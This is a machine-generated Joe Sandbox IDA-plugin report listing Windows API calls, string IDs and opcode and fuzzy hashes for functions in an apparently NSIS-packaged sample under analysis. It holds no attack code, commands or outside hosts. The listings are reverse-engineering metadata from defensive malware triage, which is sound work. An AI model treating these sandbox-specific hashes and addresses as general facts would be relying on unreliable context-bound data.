                                            • SetEnvironmentVariableA.KERNEL32(TEMP,00436400,00436400,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                            • SetEnvironmentVariableA.KERNEL32(TMP,00436400,?,00000008,0000000A,0000000C), ref: 00403700
                                            • DeleteFileA.KERNEL32(00436000,?,00000008,0000000A,0000000C), ref: 00403714
                                            • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                            • ExitProcess.KERNEL32 ref: 004037E0
                                            • lstrlenA.KERNEL32(00436400,00435000,00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                            • wsprintfA.USER32 ref: 00403846
                                            • GetFileAttributesA.KERNEL32(00431400,00436400,00431400,?,0000000C), ref: 00403878
                                            • DeleteFileA.KERNEL32(00431400), ref: 00403884
                                            • SetCurrentDirectoryA.KERNEL32(00436400,00436400,00431400,?,0000000C), ref: 004038B0
                                            • CopyFileA.KERNEL32(00436C00,00431400,00000001), ref: 004038C6
                                            • CloseHandle.KERNEL32(00000000,00431800,00431800,?,00431400,00000000), ref: 00403919
                                            • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                            • ExitProcess.KERNEL32 ref: 004039B6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$Process$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                            • String ID: "$A$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                            • API String ID: 2956269667-355692468
                                            • Opcode ID: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                            • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                            • Opcode Fuzzy Hash: e13c508dadc9a019ad899f483bcab1bf5121664e56d1959915504f3b46ceb96e
                                            • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                            APIs
                                            • DeleteFileA.KERNEL32(?,?,76D53410,00436400,00435000), ref: 00405A78
                                            • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,?,76D53410,00436400,00435000), ref: 00405AC0
                                            • lstrcatA.KERNEL32(?,0040A014,?,0042B490,?,?,76D53410,00436400,00435000), ref: 00405AE1
                                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B490,?,?,76D53410,00436400,00435000), ref: 00405AE7
                                            • FindFirstFileA.KERNEL32(0042B490,?,?,?,0040A014,?,0042B490,?,?,76D53410,00436400,00435000), ref: 00405AF8
                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                            • FindClose.KERNEL32(00000000), ref: 00405BB6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                            • String ID: \*.*
                                            • API String ID: 2035342205-1173974218
                                            • Opcode ID: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                            • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                            • Opcode Fuzzy Hash: fd14e2a26b3c5305760fc07f32de27d450e580bd3a69afa393f06f0700e9f7c9
                                            • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q$$=q$$=q$$=q$$=q$$=q$$=q$$=q$$=q$$=q
                                            • API String ID: 0-151685079
                                            • Opcode ID: c131d3a3002b24745d7d334f72430e075f6295fdd5940375d8f4f041dfd80b02
                                            • Instruction ID: ce7787722a0f2820df2e2379b53b327cf1f858a208e9b5a8241350740a38edab
                                            • Opcode Fuzzy Hash: c131d3a3002b24745d7d334f72430e075f6295fdd5940375d8f4f041dfd80b02
                                            • Instruction Fuzzy Hash: 27126E35A00259CFDB14DFA8D994A9EB7B2BF88304F208569D40AAB355DF36DD45CF80
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                                            • GetDlgItem.USER32(?,00000408), ref: 00404D56
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                                            • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                                            • DeleteObject.GDI32(00000110), ref: 00404E33
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                                            • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                                              • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                            • ShowWindow.USER32(?,00000005), ref: 00404F94
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                            • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                            • GlobalFree.KERNEL32(?), ref: 00405172
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                                            • ShowWindow.USER32(?,00000000), ref: 0040531C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                            • ShowWindow.USER32(00000000), ref: 0040532E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                            • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                            • Opcode Fuzzy Hash: f11250b3fb3f61882aa354a54652fc5f201eb5c666114b29f2145b9c808ef288
                                            • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                            • GetClientRect.USER32(?,?), ref: 004055BA
                                            • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                            • ShowWindow.USER32(?,00000008), ref: 0040565D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                              • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                            • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                            • CreateThread.KERNEL32(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                            • CloseHandle.KERNEL32(00000000), ref: 004056E4
                                            • ShowWindow.USER32(00000000), ref: 00405707
                                            • ShowWindow.USER32(?,00000008), ref: 0040570E
                                            • ShowWindow.USER32(00000008), ref: 00405754
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                            • CreatePopupMenu.USER32 ref: 00405799
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                            • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                            • OpenClipboard.USER32(00000000), ref: 00405833
                                            • EmptyClipboard.USER32 ref: 00405839
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                            • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                            • CloseClipboard.USER32 ref: 0040588A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID:
                                            • API String ID: 590372296-0
                                            • Opcode ID: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                            • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                            • Opcode Fuzzy Hash: 78ad6a42e6b7779d9936bbd3c7a2519bba8c6928c53ce4858c467149458cc8c2
                                            • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                            • ShowWindow.USER32(?), ref: 00403E8F
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                            • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                            • DestroyWindow.USER32 ref: 00403ECE
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                            • GetDlgItem.USER32(?,?), ref: 00403F06
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                            • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                            • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                            • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                            • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                            • ShowWindow.USER32(00000000,?), ref: 00404108
                                            • EnableWindow.USER32(?,?), ref: 0040411A
                                            • EnableWindow.USER32(?,?), ref: 00404135
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                            • EnableMenuItem.USER32(00000000), ref: 00404152
                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                            • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                            • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                            • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                            • String ID:
                                            • API String ID: 1860320154-0
                                            • Opcode ID: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                            • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                            • Opcode Fuzzy Hash: bb6cbcf9a1c545d3154f604be3372cfdd7ba41936c4c4c21433e3a1b8f36b1fe
                                            • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                            APIs
                                              • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                              • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                            • lstrcatA.KERNEL32(00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,76D53410,00436400,?,00435000,0000000A,0000000C), ref: 00403B11
                                            • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,00435400,00436000,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,76D53410), ref: 00403B86
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                            • GetFileAttributesA.KERNEL32(0042DFC0,?,00435000,0000000A,0000000C), ref: 00403BA4
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403BED
                                              • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                            • ShowWindow.USER32(00000005,00000000,?,00435000,0000000A,0000000C), ref: 00403CAD
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                            • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                            • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                            • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 1975747703-2904746566
                                            • Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                            • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                            • Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                            • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                            • GetSysColor.USER32(?), ref: 00404566
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                            • lstrlenA.KERNEL32(?), ref: 00404587
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                            • SendMessageA.USER32(00000000), ref: 00404610
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                            • SetCursor.USER32(00000000), ref: 00404693
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                            • SetCursor.USER32(00000000), ref: 004046AC
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: N$cD@
                                            • API String ID: 3103080414-2800326580
                                            • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                            • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                            • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                            • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                            • wsprintfA.USER32 ref: 00405F6B
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                            • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                            • GlobalFree.KERNEL32(00000000), ref: 00406054
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6142299013.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.6142169816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142492124.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142771551.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.6142922598.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_004552024107.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %s=%s$[Rename]
                                            • API String ID: 2171350718-1727408572
                                            • Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                            • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                            • Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                            • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                            • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                            • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                            • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                            • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                            • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                              • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                              • Part of subcall function 00406587: CharNextA.USER32(0000000C,*?|<>/":,00000000,?,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                              • Part of subcall function 00406587: CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                              • Part of subcall function 00406587: CharNextA.USER32(0000000C,?,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                              • Part of subcall function 00406587: CharPrevA.USER32(0000000C,0000000C,76D53410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                            • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
